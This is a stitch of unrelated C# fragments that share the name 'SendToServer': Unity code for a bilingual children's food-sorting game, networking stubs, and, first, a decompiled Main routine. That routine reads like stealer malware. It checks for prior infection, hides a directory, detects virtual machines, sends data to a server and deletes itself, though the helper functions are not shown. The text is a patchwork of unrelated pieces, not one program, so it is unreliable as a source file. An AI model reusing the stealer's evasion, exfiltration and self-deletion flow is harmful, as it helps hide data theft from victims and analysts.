// Token: 0x0600009B RID: 155 RVA: 0x000081F0 File Offset: 0x000063F0 private static void Main(string[] args) { try { Task.Factory.StartNew(delegate() { CheckPovt.CheckPril(); }).Wait(); if (File.Exists(Program.path)) { File.Delete(Program.path); } DirectoryInfo directoryInfo = Directory.CreateDirectory(Program.path); directoryInfo.Attributes = (FileAttributes.Hidden | FileAttributes.Directory); Task.Factory.StartNew(delegate() { VirtualMachine.CheckVM(); }).Wait(); Task.Factory.StartNew(delegate() { Program.Helper(); }).Wait(); Task.Factory.StartNew(delegate() { SendToServer.StratSend(); }).Wait(); Task.Factory.StartNew(delegate() { Delete.SelfDelete(); }).Wait(); } catch { } }
public void Start() { StaticCheckGame.reset(); if (StaticMinigame3Controller.getReplay() == true) { instructionsPanel.SetActive(false); } StaticCheckGame.reset(); if (StaticLanguage.getLanguage().Equals("portuguese")) { instructions.text = "Organiza o frigorífico o máximo número de vezes dentro do tempo limite, movendos as comidas para o respetivo lugar seguindo estas regras:\n - Bebidas na porta;\n - Apenas os vegetais e frutas podem estar na secção inferior do frigorífico;\n - Na mesma secção apenas pode existir uma família de alimentos."; instructionHighscoreSub.text = "Melhor Pontuação"; gameEndHighscoreSub.text = "Melhor Pontuação"; } else { instructions.text = "Organize the fridge, as many times as you can within the time limit, moving the foods to their respective places following these rules:\n - Drinks on the door;\n - Only vegetables and fruits can stay on the lower section of the fridge;\n - On the same section there can only be one food family."; instructionHighscoreSub.text = "Highscore"; gameEndHighscoreSub.text = "Highscore"; } if (!System.IO.File.Exists(Application.persistentDataPath + "/sendToServer")) { sendToServer = new SendToServer(); } else { sendToServer = FileManager.ReadFromBinaryFile <SendToServer> (Application.persistentDataPath + "/sendToServer"); } highscore.text = "" + sendToServer.minigame2Highscore; setFoods(); }
public void Start() { if (StaticMinigame3Controller.getReplay() == true) { instructionsPanel.SetActive(false); } if (StaticLanguage.getLanguage().Equals("portuguese")) { instructions.text = "Em cada ronda, escolhe a comida que deves levar na lancheira. A cada resposta correta ganharás 1 ponto."; instructionHighscoreSub.text = "Melhor Pontuação"; gameEndHighscoreSub.text = "Melhor Pontuação"; } else { instructions.text = "In each round, choose the food you should take on your lunchbox. Each correct answear awards you with 1 point."; instructionHighscoreSub.text = "Highscore"; gameEndHighscoreSub.text = "Highscore"; } if (!System.IO.File.Exists(Application.persistentDataPath + "/sendToServer")) { sendToServer = new SendToServer(); } else { sendToServer = FileManager.ReadFromBinaryFile <SendToServer> (Application.persistentDataPath + "/sendToServer"); } time.text = roundTime.ToString(); score.text = scoreNumber.ToString(); highscore.text = "" + sendToServer.minigame3Highscore; healthyIngredients = new List <string> () { "banana_0", "carrot_0", "cucumber_0", "grapes_0", "kiwi_0", "orange_0", "pear_0", "sandwich_0", "tomato_0" }; unhealthyIngredients = new List <string> () { "candy_1", "candyStick_1", "hamburger_1", "hotdog_1", "pizza_1", "popcorn_1" }; choice1.onClick.AddListener(delegate { taskOnClick(choice1); }); choice2.onClick.AddListener(delegate { taskOnClick(choice2); }); setIngredients(); }
public void Start() { if (StaticLanguage.getLanguage().Equals("portuguese")) { legumesText.text = "Legumes e Verduras"; hidratosText.text = "Hidratos de Carbono"; proteinaVText.text = "Proteína Vegetal"; proteinaAText.text = "Proteína Animal"; frutaText.text = "Frutas"; } else { legumesText.text = "Vegetables"; hidratosText.text = "Carbohydrates"; proteinaVText.text = "Vegetable Protein"; proteinaAText.text = "Animal Protein"; frutaText.text = "Fruits"; } if (StaticMinigame3Controller.getReplay() == true) { instructionsPanel.SetActive(false); } StaticCheckGame.reset(); if (StaticLanguage.getLanguage().Equals("portuguese")) { instructions.text = "Organiza o teu prato, o máximo número de vezes dentro do tempo limite, movendo as comidas para o seu respetivo lugar."; instructionHighscoreSub.text = "Melhor Pontuação"; gameEndHighscoreSub.text = "Melhor Pontuação"; } else { instructions.text = "Organize your plate, as many times as you can within the time limit, moving the foods to their respective places."; instructionHighscoreSub.text = "Highscore"; gameEndHighscoreSub.text = "Highscore"; } if (!System.IO.File.Exists(Application.persistentDataPath + "/sendToServer")) { sendToServer = new SendToServer(); } else { sendToServer = FileManager.ReadFromBinaryFile <SendToServer> (Application.persistentDataPath + "/sendToServer"); } time.text = "" + roundTime; score.text = "" + scoreNumber; highscore.text = "" + sendToServer.minigame4Highscore; setIngredients(); }
// Use this for initialization IEnumerator Start() { if (System.IO.File.Exists(Application.persistentDataPath + "/sendToServer")) { sendToServer = FileManager.ReadFromBinaryFile <SendToServer> (Application.persistentDataPath + "/sendToServer"); if (sendToServer.Id < 0) { yield return(createUser()); yield return(sendMinigame1Data()); yield return(sendMinigame2Data()); yield return(sendMinigame3Data()); yield return(sendMinigame4Data()); } yield return(sendMinigame1Data()); yield return(sendMinigame2Data()); yield return(sendMinigame3Data()); yield return(sendMinigame4Data()); } else { sendToServer = new SendToServer(); yield return(sendMinigame1Data()); yield return(sendMinigame2Data()); yield return(sendMinigame3Data()); yield return(sendMinigame4Data()); } }
public void Start() { if (!System.IO.File.Exists(Application.persistentDataPath + "/data")) { status = new Minigame1Status(); } else { status = FileManager.ReadFromBinaryFile <Minigame1Status> (Application.persistentDataPath + "/data"); } if (!System.IO.File.Exists(Application.persistentDataPath + "/sendToServer")) { sendToServer = new SendToServer(); } else { sendToServer = FileManager.ReadFromBinaryFile <SendToServer> (Application.persistentDataPath + "/sendToServer"); } picture.GetComponent <Image> ().sprite = Resources.Load("Minigame 1/" + StaticSceneManager.GetSceneImage(), typeof(Sprite)) as Sprite; string imageName = picture.GetComponent <Image> ().sprite.name.ToUpper(); string[] imageNameLanguages = imageName.Split('_'); if (StaticLanguage.getLanguage() == "portuguese") { solution = imageNameLanguages[0]; } if (StaticLanguage.getLanguage() == "english") { solution = imageNameLanguages [1]; } text.text = " "; setBlanks(solution); setButtons(solution); }
protected override void OnEnterScope() { SendToServer.Authenticate("sour", "testpw"); }
public void SpawnCarOnServer(int objectID, bool active) { SendToServer.RecieveNewCarSpawn(objectID, active); }
public void UpdateObjectState(int objectID, bool active, Vector3 position, Vector3 rotation, Vector3 localScale) { SendToServer.RecieveObjectStateAndPosition(objectID, active, position, rotation, localScale); }
public void UpdateObjectState(int objectID, bool active) { SendToServer.RecieveObjectState(objectID, active); }
public void UpdateObjectPosition(int objectID, Vector3 position, Vector3 rotation, Vector3 localScale) { SendToServer.RecieveObjectPosition(objectID, position, rotation, localScale); }
public void SendPacket(int packetNum, string contents) { SendToServer.RecievePacket(packetNum, contents); }